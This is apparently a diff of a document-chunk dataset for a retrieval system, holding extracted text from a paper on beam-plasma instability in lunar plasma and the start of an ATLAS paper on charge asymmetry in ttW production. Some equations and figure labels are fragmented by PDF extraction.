+ page_content=' Every such mode with a specific k will have its growth rate given by equation (20).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
97
+ page_content=' The growth factor with k (for different values of ne) is plotted in Figure 2 to find the fastest growing mode and to look for the expression for a specific k which gives the maximum growth.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
98
+ page_content='The ne variation is taken as 10 cm-3, 50 cm-3, 100 cm-3, 200 cm-3 and 300 cm-3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
99
+ page_content=' Figure 2: The growth factor with k for different ne.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
100
+ page_content=' Let K = (1 + α + 3α1/3 + 3α2/3), equation (20) becomes ⁄ √ ( ⁄ ) ⁄ ( ) [ ] ⁄ (21) ⁄ √ ( ⁄ ) [ ( ) ⁄ ( ) ⁄ ] For maxima dωim/dωd = 0 ⁄ √ ( ⁄ ) [ ( ) ⁄ ( ) ⁄ ] which gives √ Now ωd = kvb, hence we get √ Inserting K from above ( ) √ ⁄ ⁄ 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
101
+ page_content='2 Decay Rate When the dispersion relation is expanded in the Taylor series, the complex solutions comes √ ( ) ( ) This gives two solutions which are complex conjugates of each other.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
102
+ page_content=' The imaginary partgives the beam plasma instability and the other a propagating mode.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
103
+ page_content=' E = E0ei(kx-ωt) , ω = ωr ± iωim, ( ) which becomes ( ) The solution corresponding to +ωim correspond to the instability and the solution with −ωim corresponds to a decaying mode as with time the amplitude will decrease.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
104
+ page_content=' These growing and decaying modes show striking similarity in its properties with the instabilities.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
105
+ page_content=' The decay rate with respect to k value of the modes for different values of ne is shown in Figure 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
106
+ page_content=' It can be seen from the figure that a mode with highest decay rate will decay early and with increasing ne, the k value with the highest decay rate will also increase.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
107
+ page_content=' Therefore, it can be concluded that the solar wind impact on the lunar plasma can trigger (i) Langmuir plasma oscillations;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
108
+ page_content=' (ii) Right beam propagating modes;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
109
+ page_content=' (iii) Beam-plasma instability;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
110
+ page_content=' (iv) Beam plasma decay mode.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
111
+ page_content=' Figure 3: Symmetric nature of decay and growth rates.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
112
+ page_content=' The growth rate and decay rate are symmetric to each other which means for a given ne, the maximum growth rate and decay rate occur at the same k value.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
113
+ page_content=' This strong symmetric nature suggests a strong energy exchange mechanism i.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
114
+ page_content='e.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
115
+ page_content=' with time the instability modes gain energy and in other case with time the decay modes loose energy.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
116
+ page_content=' It suggests that a resonance exist between the solar wind, lunar plasma and plasma instability where during the instability growth the solar wind dump energy in the lunar plasma and during the decay the lunar plasma pumps energy in the solar wind quenching the instability.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
117
+ page_content=' 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
118
+ page_content=' References 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
119
+ page_content=' Mickael Melzani, “Plasma Instabilities”, Centre de Recherche Astrophysique de Lyon, Ecole Normale Superieure de Lyon, France, 2014, Page: 1-24 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
120
+ page_content=' Alexander Piel, “Plasma Physics”, Springer-Verlag, Berlin Heidelberg, doi:10.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
121
+ page_content='1007/978-3-642-10491-6 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
122
+ page_content=' D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
123
+ page_content=' Anderson, R.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
124
+ page_content=' Fedele, & M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
125
+ page_content=' Lisak, “A tutorial presentation of the two stream instability and Landau damping”, Am.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
126
+ page_content=' J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
127
+ page_content=' Phys.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
128
+ page_content=', 69 (12), 2001, 1262-1266, doi:10.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
129
+ page_content='1119/1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
130
+ page_content='14072521 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
131
+ page_content='35 ne=10cmA3 ne=50cm^3 ne=100cm^3 E"O ne=200cm^3 ne=300cmA3 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
132
+ page_content='25 .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
133
+ page_content='pe m/!' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
134
+ page_content=' m 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
135
+ page_content='2 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
136
+ page_content='15 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
137
+ page_content='1 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
138
+ page_content='05 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
139
+ page_content='5 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
140
+ page_content='5 2 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
141
+ page_content='5 3 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
142
+ page_content='5 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
143
+ page_content='5 w_d/w_pe0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
144
+ page_content='4 ne=10cmA3 ne =50cmA3 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
145
+ page_content='3 ne=100cmA 3 ne=200cm^3 ne=300cmA 3 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
146
+ page_content='2 w_im/w_pe 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
147
+ page_content='1 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
148
+ page_content="1 2'0 0." metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
149
+ page_content='3 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
150
+ page_content='4 0 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
151
+ page_content='5 1 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
152
+ page_content='5 2 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
153
+ page_content='5 3 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
154
+ page_content='5 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
155
+ page_content='5 w_d/w_pe' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/HtE0T4oBgHgl3EQfhwE8/content/2301.02435v1.pdf'}
HtE2T4oBgHgl3EQf_AnW/content/tmp_files/2301.04245v1.pdf.txt ADDED
@@ -0,0 +1,2604 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ EUROPEAN ORGANISATION FOR NUCLEAR RESEARCH (CERN)
2
+ Submitted to: JHEP
3
+ CERN-EP-2022-249
4
+ 12th January 2023
5
+ Search for leptonic charge asymmetry in 𝒕¯𝒕𝑾
6
+ production in final states with three leptons at
7
+ √𝒔 = 13 TeV
8
+ The ATLAS Collaboration
9
+ A search for the leptonic charge asymmetry (𝐴ℓ
10
+ c) of top-quark–antiquark pair production in
11
+ association with a 𝑊 boson (𝑡¯𝑡𝑊) is presented. The search is performed using final states
12
+ with exactly three charged light leptons (electrons or muons) and is based on √𝑠 = 13 TeV
13
+ proton–proton collision data collected with the ATLAS detector at the Large Hadron Collider
14
+ at CERN during the years 2015–2018, corresponding to an integrated luminosity of 139 fb−1.
15
+ A profile-likelihood fit to the event yields in multiple regions corresponding to positive and
16
+ negative differences between the pseudorapidities of the charged leptons from top-quark and
17
+ top-antiquark decays is used to extract the charge asymmetry. At reconstruction level, the
18
+ asymmetry is found to be −0.123 ± 0.136 (stat.) ± 0.051 (syst.). An unfolding procedure is
19
+ applied to convert the result at reconstruction level into a charge-asymmetry value in a fiducial
20
+ volume at particle level with the result of −0.112 ± 0.170 (stat.) ± 0.054 (syst.). The Standard
21
+ Model expectations for these two observables are calculated using Monte Carlo simulations
22
+ with next-to-leading-order plus parton shower precision in quantum chromodynamics and
23
+ including next-to-leading-order electroweak corrections.
24
+ They are −0.084 +0.005
25
+ −0.003 (scale)
26
+ ± 0.006 (MC stat.) and −0.063 +0.007
27
+ −0.004 (scale) ± 0.004 (MC stat.) respectively, and in agreement
28
+ with the measurements.
29
+ © 2023 CERN for the benefit of the ATLAS Collaboration.
30
+ Reproduction of this article or parts of it is allowed as specified in the CC-BY-4.0 license.
31
+ arXiv:2301.04245v1 [hep-ex] 10 Jan 2023
32
+
33
+ CERN1 Introduction
34
+ The production of a top-quark–antiquark (𝑡¯𝑡) pair in association with a 𝑊 boson, commonly referred to as
35
+ 𝑡¯𝑡𝑊, is a rare process in the Standard Model (SM) that can be produced at the Large Hadron Collider (LHC).
36
+ State-of-the-art cross-section calculations for the 𝑡¯𝑡𝑊 process are especially complex, as large corrections
37
+ arise from higher powers of both the strong and weak couplings [1]. Thus, measurements of the 𝑡¯𝑡𝑊 process
38
+ represent a sensitive test of the predictions of quantum chromodynamics (QCD) and the electroweak (EW)
39
+ sector of the SM, as well as their interplay. Both the inclusive and differential cross-section measurements
40
+ are very relevant, as they can provide indirect hints of new physics beyond the SM (BSM) in scenarios
41
+ where at least one of the SM couplings is modified [2]. Furthermore, it can be one of the main backgrounds
42
+ in searches for BSM phenomena, such as supersymmetric squark or gluino production or vector-like
43
+ quarks [3, 4]. It also represents an irreducible background in many measurements of SM processes such as
44
+ 𝑡¯𝑡 production in association with a Higgs boson (𝑡¯𝑡𝐻) or the production of four top quarks (𝑡¯𝑡𝑡¯𝑡) [5, 6]. The
45
+ inclusive cross-section of 𝑡¯𝑡𝑊 production has been measured by both the ATLAS and CMS collaborations
46
+ at √𝑠 = 13 TeV using partial and full LHC Run 2 datasets [7, 8], respectively.
47
+ Illustrative Feynman diagrams contributing to 𝑡¯𝑡𝑊 production at leading order (LO) and next-to-leading
48
+ order (NLO) for both QCD and EW production are shown in Figure 1 where 𝑞′ indicates a quark of different
49
+ flavour from that of the other initial-state quark. At LO, only the 𝑞 ¯𝑞′ initial state is present (Figure 1 a,b). At
50
+ NLO, the quark–gluon (𝑞𝑔) channels open up (Figure 1 c,d), whereas gluon–gluon (𝑔𝑔) fusion production
51
+ does not contribute until next-to-next-to-leading-order (NNLO) corrections are included.
52
+ t
53
+ ¯t
54
+
55
+ ¯q
56
+ q′
57
+ g
58
+ t
59
+ ¯t
60
+
61
+ ¯q
62
+ q′
63
+ Z/γ
64
+ t
65
+ ¯t
66
+ ¯q′
67
+
68
+ ¯q
69
+ g
70
+
71
+ t
72
+ ¯t
73
+ ¯q′
74
+ ¯q
75
+ g
76
+ H
77
+ (a)
78
+ (b)
79
+ (c)
80
+ (d)
81
+ 1
82
+ Figure 1: Examples of Feynman diagrams of 𝑡¯𝑡𝑊 production at (a,b) LO and (c,d) NLO with one extra parton. The
83
+ diagrams show (a,c) QCD and (b,d) EW 𝑡¯𝑡𝑊 production.
84
+ In 𝑡¯𝑡 production, the top quark (top antiquark) is preferentially produced in the direction of the incoming
85
+ quark (antiquark). This is due to the interference effects between amplitudes in the 𝑞 ¯𝑞 initial state and results
86
+ in a difference in the rapidity distribution between top quarks and top antiquarks.1 In proton–proton (𝑝𝑝)
87
+ collisions at the LHC, this production asymmetry results in a central–forward rapidity charge asymmetry
88
+ as top quarks (antiquarks) are produced with more forward (central) rapidities. Given that 𝑡¯𝑡 production at
89
+ the LHC is dominated by the charge-symmetric 𝑔𝑔 initial state, such asymmetry is a subtle (order of 1%)
90
+ effect. At the Tevatron collider (𝑝 ¯𝑝 collisions), the preferential direction of the incoming quark (antiquark)
91
+ is very likely to coincide with that of the proton (antiproton). Thus, a forward–backward asymmetry is
92
+ sizable (order of 10%).
93
+ 1 ATLAS uses a right-handed coordinate system with its origin at the nominal interaction point in the centre of the detector and
94
+ the 𝑧-axis along the beam pipe. The 𝑥-axis points from the interaction point to the centre of the LHC ring, and the 𝑦-axis points
95
+ upwards. Cylindrical coordinates (𝑟, 𝜙) are used in the transverse plane, 𝜙 being the azimuthal angle around the 𝑧-axis. The
96
+ rapidity (𝑦) of a particle is given by 𝑦 = 1/2 ln (𝐸 + 𝑝𝑧)/(𝐸 − 𝑝𝑧). The pseudorapidity (𝜂) is defined in terms of the polar
97
+ angle 𝜃 as 𝜂 = − ln tan(𝜃/2). The angular distance is measured in units of Δ𝑅 ≡
98
+ √︁
99
+ (Δ𝜂)2 + (Δ𝜙)2.
100
+ 2
101
+
102
+ The top-quark-based rapidity charge asymmetry (𝐴𝑡
103
+ c,𝑦) is defined by
104
+ 𝐴𝑡
105
+ c,𝑦 = 𝑁 (Δ𝑦𝑡 > 0) − 𝑁 (Δ𝑦𝑡 < 0)
106
+ 𝑁 (Δ𝑦𝑡 > 0) + 𝑁 (Δ𝑦𝑡 < 0) ,
107
+ (1)
108
+ where Δ𝑦𝑡 = |𝑦𝑡| − |𝑦¯𝑡| is the difference between the absolute rapidities of the top quark (|𝑦𝑡|) and top
109
+ antiquark (|𝑦¯𝑡|), respectively.
110
+ In 𝑡¯𝑡𝑊 production, the relative dominance of the 𝑞 ¯𝑞′ initial state leads to a larger rapidity charge asymmetry
111
